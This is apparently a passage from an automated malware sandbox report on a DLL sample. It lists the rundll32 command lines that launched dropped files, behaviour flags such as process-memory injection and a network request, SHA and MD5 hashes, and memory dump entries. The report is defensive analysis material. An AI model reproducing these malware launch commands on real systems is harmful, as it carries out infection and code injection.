        "C:\Windows\system32\rundll32.exe" C:\Users\Admin\K06ya08\N4gdznc\I5nylujk_.dll #1
        Suspicious use of WriteProcessMemory
        PID:1928
        • C:\Windows\SysWOW64\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\K06ya08\N4gdznc\I5nylujk_.dll #1
          Loads dropped DLL
          Drops file in System32 directory
          Suspicious use of WriteProcessMemory
          PID:1316
          • C:\Windows\SysWOW64\rundll32.exe
            C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Zyhm\zomuht.ouh",RunDLL
            Blocklisted process makes network request
            Suspicious behavior: EnumeratesProcesses
            PID:1776

Network

MITRE ATT&CK Matrix

Collection

    Command and Control

      Credential Access

        Defense Evasion

        Discovery

          Execution

            Exfiltration

              Impact

                Initial Access

                  Lateral Movement

                    Persistence

                      Privilege Escalation

                        Replay Monitor

                        00:00 00:00

                        Downloads

                        • C:\Users\Admin\K06ya08\N4gdznc\I5nylujk_.dll
                          MD5

                          a001c231c5d0ac74b3fb528b6608440c

                          SHA1

                          04533205e47ab45ac27b07aff6c6bdfde755236e

                          SHA256

                          7336aa71392edd29d50c82cf0daaf60f897674719b45d0000b6c08250f0a6a35

                          SHA512

                          669a61052ab88028568f25a237bc21f0a2a41371f1a4951402b60c66cb130cb9c5f695c993259aa3735fc83073abaf79cbdf19ce4a8a5a8c286afc5b7471f1b1

                          Download Submit
                        • \Users\Admin\K06ya08\N4gdznc\I5nylujk_.dll
                          MD5

                          a001c231c5d0ac74b3fb528b6608440c

                          SHA1

                          04533205e47ab45ac27b07aff6c6bdfde755236e

                          SHA256

                          7336aa71392edd29d50c82cf0daaf60f897674719b45d0000b6c08250f0a6a35

                          SHA512

                          669a61052ab88028568f25a237bc21f0a2a41371f1a4951402b60c66cb130cb9c5f695c993259aa3735fc83073abaf79cbdf19ce4a8a5a8c286afc5b7471f1b1

                          Download Submit
                        • \Users\Admin\K06ya08\N4gdznc\I5nylujk_.dll
                          MD5

                          a001c231c5d0ac74b3fb528b6608440c

                          SHA1

                          04533205e47ab45ac27b07aff6c6bdfde755236e

                          SHA256

                          7336aa71392edd29d50c82cf0daaf60f897674719b45d0000b6c08250f0a6a35

                          SHA512

                          669a61052ab88028568f25a237bc21f0a2a41371f1a4951402b60c66cb130cb9c5f695c993259aa3735fc83073abaf79cbdf19ce4a8a5a8c286afc5b7471f1b1

                          Download Submit
                        • \Users\Admin\K06ya08\N4gdznc\I5nylujk_.dll
                          MD5

                          a001c231c5d0ac74b3fb528b6608440c

                          SHA1

                          04533205e47ab45ac27b07aff6c6bdfde755236e

                          SHA256

                          7336aa71392edd29d50c82cf0daaf60f897674719b45d0000b6c08250f0a6a35

                          SHA512

                          669a61052ab88028568f25a237bc21f0a2a41371f1a4951402b60c66cb130cb9c5f695c993259aa3735fc83073abaf79cbdf19ce4a8a5a8c286afc5b7471f1b1

                          Download Submit
                        • \Users\Admin\K06ya08\N4gdznc\I5nylujk_.dll
                          MD5

                          a001c231c5d0ac74b3fb528b6608440c

                          SHA1

                          04533205e47ab45ac27b07aff6c6bdfde755236e

                          SHA256

                          7336aa71392edd29d50c82cf0daaf60f897674719b45d0000b6c08250f0a6a35

                          SHA512

                          669a61052ab88028568f25a237bc21f0a2a41371f1a4951402b60c66cb130cb9c5f695c993259aa3735fc83073abaf79cbdf19ce4a8a5a8c286afc5b7471f1b1

                          Download Submit
                        • memory/1316-13-0x0000000000000000-mapping.dmp
                          Download
                        • memory/1316-18-0x0000000000180000-0x00000000001A0000-memory.dmp
                          Download
                        • memory/1512-2-0x0000000000000000-mapping.dmp
                          Download
                        • memory/1664-21-0x000007FEF7140000-0x000007FEF73BA000-memory.dmp
                          Download
                        • memory/1776-19-0x0000000000000000-mapping.dmp
                          Download
                        • memory/1776-20-0x0000000000160000-0x0000000000180000-memory.dmp
                          Download
                        • memory/1780-9-0x000000001B8D0000-0x000000001B8D1000-memory.dmp
                          Download
                        • memory/1780-3-0x0000000000000000-mapping.dmp
                          Download
                        • memory/1780-8-0x0000000002600000-0x0000000002601000-memory.dmp
                          Download
                        • memory/1780-7-0x0000000002430000-0x0000000002431000-memory.dmp
                          Download
                        • memory/1780-5-0x00000000023D0000-0x00000000023D1000-memory.dmp
                          Download
                        • memory/1780-6-0x000000001ABB0000-0x000000001ABB1000-memory.dmp
                          Download
                        • memory/1780-10-0x000000001B960000-0x000000001B961000-memory.dmp
                          Download
                        • memory/1780-4-0x000007FEF4E60000-0x000007FEF584C000-memory.dmp
                          Download
                        • memory/1928-11-0x0000000000000000-mapping.dmp
                          Download
                        • memory/1928-22-0x0000000000000000-mapping.dmp
                          Download